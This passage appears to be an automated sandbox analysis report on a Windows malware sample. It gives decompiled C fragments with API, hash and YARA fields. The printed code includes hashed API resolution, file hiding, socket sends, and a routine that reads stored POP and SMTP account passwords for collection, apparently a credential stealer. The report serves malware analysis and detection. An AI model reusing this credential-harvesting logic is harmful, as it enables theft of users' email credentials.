                                  0x00403c78
                                  0x00403c82
                                  0x00403c8b
                                  0x00403c8f
                                  0x00403c72
                                  0x00403c76
                                  0x00403c76

                                  APIs
                                  • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateDirectory
                                  • String ID:
                                  • API String ID: 4241100979-0
                                  • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                  • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                                  • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                  • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040642C, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
                                  			E0040642C(void* __eflags) {
				short _v40;
				intOrPtr* _t6;
				void* _t10;

				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
				 *_t6( &_v40); // executed
				return 0 | _v40 == 0x00000009;
			}






                                  0x0040643c
                                  0x00406445
                                  0x00406454

                                  APIs
                                  • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: InfoNativeSystem
                                  • String ID:
                                  • API String ID: 1721193555-0
                                  • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                  • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                                  • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                  • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404EEA, Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
                                  			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t5;

				_t5 = _a12;
				if(_t5 == 0) {
					_t5 = E00405D0B(_a8) + 1;
				}
				__imp__#19(_a4, _a8, _t5, 0); // executed
				return _t5;
			}




                                  0x00404eed
                                  0x00404ef2
                                  0x00404efd
                                  0x00404efd
                                  0x00404f07
                                  0x00404f0e

                                  APIs
                                  • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: send
                                  • String ID:
                                  • API String ID: 2809346765-0
                                  • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                  • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                                  • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                  • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403BD0, Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
				int _t6;
				void* _t7;

				E004031E5(_t7, 0, 0xc9143177, 0, 0);
				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
				return _t6;
			}





                                  0x00403bdd
                                  0x00403beb
                                  0x00403bee

                                  APIs
                                  • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FileMove
                                  • String ID:
                                  • API String ID: 3562171763-0
                                  • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                  • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                                  • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                  • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404DF3, Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Startup
                                  • String ID:
                                  • API String ID: 724789610-0
                                  • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                  • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                  • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                  • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040427D, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040427D(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
				return _t4;
			}





                                  0x0040428a
                                  0x00404297
                                  0x0040429a

                                  APIs
                                  • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                  • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                                  • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                  • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404A19, Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00404A19(void* _a4, short* _a8, void** _a12) {
				long _t5;
				void* _t6;

				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
				return _t5;
			}





                                  0x00404a27
                                  0x00404a35
                                  0x00404a38

                                  APIs
                                  • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                  • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                                  • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                  • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403C40, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00403C40(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
				_t4 = FindCloseChangeNotification(_a4); // executed
				return _t4;
			}





                                  0x00403c4d
                                  0x00403c55
                                  0x00403c58

                                  APIs
                                  • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                  • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                                  • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                  • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403C08, Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00403C08(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
				_t4 = DeleteFileW(_a4); // executed
				return _t4;
			}





                                  0x00403c15
                                  0x00403c1d
                                  0x00403c20

                                  APIs
                                  • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: DeleteFile
                                  • String ID:
                                  • API String ID: 4033686569-0
                                  • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                  • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                                  • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                  • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402C1F, Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00402C1F(WCHAR* _a4) {
				struct HINSTANCE__* _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
				_t4 = LoadLibraryW(_a4); // executed
				return _t4;
			}





                                  0x00402c2c
                                  0x00402c34
                                  0x00402c37

                                  APIs
                                  • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                  • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                  • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                  • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403BEF, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00403BEF(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
				_t4 = FindClose(_a4); // executed
				return _t4;
			}





                                  0x00403bfc
                                  0x00403c04
                                  0x00403c07

                                  APIs
                                  • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseFind
                                  • String ID:
                                  • API String ID: 1863332320-0
                                  • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                  • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                                  • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                  • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403BB7, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00403BB7(WCHAR* _a4) {
				long _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xc6808176, 0, 0);
				_t4 = GetFileAttributesW(_a4); // executed
				return _t4;
			}





                                  0x00403bc4
                                  0x00403bcc
                                  0x00403bcf

                                  APIs
                                  • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                  • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                                  • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                  • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004049FF, Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004049FF(void* _a4) {
				long _t3;
				void* _t4;

				E004031E5(_t4, 9, 0xd980e875, 0, 0);
				_t3 = RegCloseKey(_a4); // executed
				return _t3;
			}





                                  0x00404a0d
                                  0x00404a15
                                  0x00404a18

                                  APIs
                                  • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                  • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                  • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                  • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403B64, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00403B64(WCHAR* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
				_t3 = PathFileExistsW(_a4); // executed
				return _t3;
			}





                                  0x00403b72
                                  0x00403b7a
                                  0x00403b7d

                                  APIs
                                  • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: ExistsFilePath
                                  • String ID:
                                  • API String ID: 1174141254-0
                                  • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                  • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                                  • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                  • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404DE5, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                  Download Yara Rule
                                  APIs
                                  • closesocket.WS2_32(00404EB0), ref: 00404DEB
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: closesocket
                                  • String ID:
                                  • API String ID: 2781271927-0
                                  • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                  • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                                  • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                  • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403F9E, Relevance: 1.3, APIs: 1, Instructions: 16COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00403F9E(void* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
				return _t3;
			}





                                  0x00403fac
                                  0x00403fba
                                  0x00403fbe

                                  APIs
                                  • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FreeVirtual
                                  • String ID:
                                  • API String ID: 1263568516-0
                                  • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                  • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                                  • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                  • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406472, Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00406472(long _a4) {
				void* _t3;
				void* _t4;

				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
				Sleep(_a4); // executed
				return _t3;
			}





                                  0x0040647f
                                  0x00406487
                                  0x0040648a

                                  APIs
                                  • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID:
                                  • API String ID: 3472027048-0
                                  • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                  • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                                  • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                  • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405924, Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00405924(WCHAR* _a4, WCHAR* _a8) {
				WCHAR* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xd6865bd4, 0, 0);
				_t4 = StrStrW(_a4, _a8); // executed
				return _t4;
			}





                                  0x00405932
                                  0x0040593d
                                  0x00405940

                                  APIs
                                  • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                  • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                                  • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                  • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 0040434D, Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CoInitialize.OLE32(00000000), ref: 0040438F
                                  • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                  • VariantInit.OLEAUT32(?), ref: 004043C4
                                  • SysAllocString.OLEAUT32(?), ref: 004043CD
                                  • VariantInit.OLEAUT32(?), ref: 00404414
                                  • SysAllocString.OLEAUT32(?), ref: 00404419
                                  • VariantInit.OLEAUT32(?), ref: 00404431
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: InitVariant$AllocString$CreateInitializeInstance
                                  • String ID:
                                  • API String ID: 1312198159-0
                                  • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                  • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                  • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                  • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D069, Relevance: 12.6, Strings: 10, Instructions: 138COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 88%
                                  			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t40;
				intOrPtr _t45;
				intOrPtr _t47;
				void* _t71;
				void* _t75;
				void* _t77;

				_t72 = _a4;
				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
				_t81 = _t71;
				if(_t71 != 0) {
					_push(__ebx);
					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
					_v8 = _v8 & 0x00000000;
					_v20 = _t40;
					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
					_v12 = _v12 & 0x00000000;
					_v32 = _t45;
					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
					_t77 = _t75 + 0x50;
					_v36 = _t47;
					if(_v8 != 0 || _v12 != 0) {
						E00405872( *0x49f934, _t71, 1, 0);
						E00405872( *0x49f934, _t67, 1, 0);
						_t74 = _v16;
						E00405872( *0x49f934, _v16, 1, 0);
						E00405781( *0x49f934, _v40);
						E00405872( *0x49f934, _v20, 1, 0);
						_push(_v8);
						E00405762(_v16,  *0x49f934, _v24);
						E00405872( *0x49f934, _v28, 1, 0);
						E00405781( *0x49f934, _v44);
						E00405872( *0x49f934, _v32, 1, 0);
						_push(_v12);
						E00405762(_t74,  *0x49f934, _v36);
						_t77 = _t77 + 0x88;
					} else {
						_t74 = _v16;
					}
					E0040471C(_t71);
					E0040471C(_t67);
					E0040471C(_t74);
					E0040471C(_v20);
					E0040471C(_v24);
					E0040471C(_v28);
					E0040471C(_v32);
					E0040471C(_v36);
				}
				return 1;
			}





















                                  0x0040d070
                                  0x0040d080
                                  0x0040d084
                                  0x0040d086
                                  0x0040d08c
                                  0x0040d0a0
                                  0x0040d0ae
                                  0x0040d0bd
                                  0x0040d0c0
                                  0x0040d0c5
                                  0x0040d0c9
                                  0x0040d0e3
                                  0x0040d0f2
                                  0x0040d101
                                  0x0040d104
                                  0x0040d109
                                  0x0040d110
                                  0x0040d11e
                                  0x0040d123
                                  0x0040d126
                                  0x0040d12d
                                  0x0040d145
                                  0x0040d154
                                  0x0040d15a
                                  0x0040d166
                                  0x0040d174
                                  0x0040d186
                                  0x0040d18e
                                  0x0040d19a
                                  0x0040d1ac
                                  0x0040d1ba
                                  0x0040d1cc
                                  0x0040d1d1
                                  0x0040d1dd
                                  0x0040d1e2
                                  0x0040d1e7
                                  0x0040d1e7
                                  0x0040d1e7
                                  0x0040d1eb
                                  0x0040d1f1
                                  0x0040d1f7
                                  0x0040d1ff
                                  0x0040d207
                                  0x0040d20f
                                  0x0040d217
                                  0x0040d21f
                                  0x0040d227
                                  0x0040d230

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                  • API String ID: 0-2111798378
                                  • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                  • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                  • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                  • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040317B, Relevance: .0, Instructions: 46COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 90%
                                  			E0040317B(intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				void* __ecx;
				intOrPtr _t17;
				void* _t21;
				intOrPtr* _t23;
				void* _t26;
				void* _t28;
				intOrPtr* _t31;
				void* _t33;
				signed int _t34;

				_push(_t25);
				_t1 =  &_v8;
				 *_t1 = _v8 & 0x00000000;
				_t34 =  *_t1;
				_v8 =  *[fs:0x30];
				_t23 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xc)) + 0xc));
				_t31 = _t23;
				do {
					_v12 =  *((intOrPtr*)(_t31 + 0x18));
					_t28 = E00402C77(_t34,  *((intOrPtr*)(_t31 + 0x28)));
					_pop(_t26);
					_t35 = _t28;
					if(_t28 == 0) {
						goto L3;
					} else {
						E004032EA(_t35, _t28, 0);
						_t21 = E00402C38(_t26, _t28, E00405D24(_t28) + _t19);
						_t33 = _t33 + 0x14;
						if(_a4 == _t21) {
							_t17 = _v12;
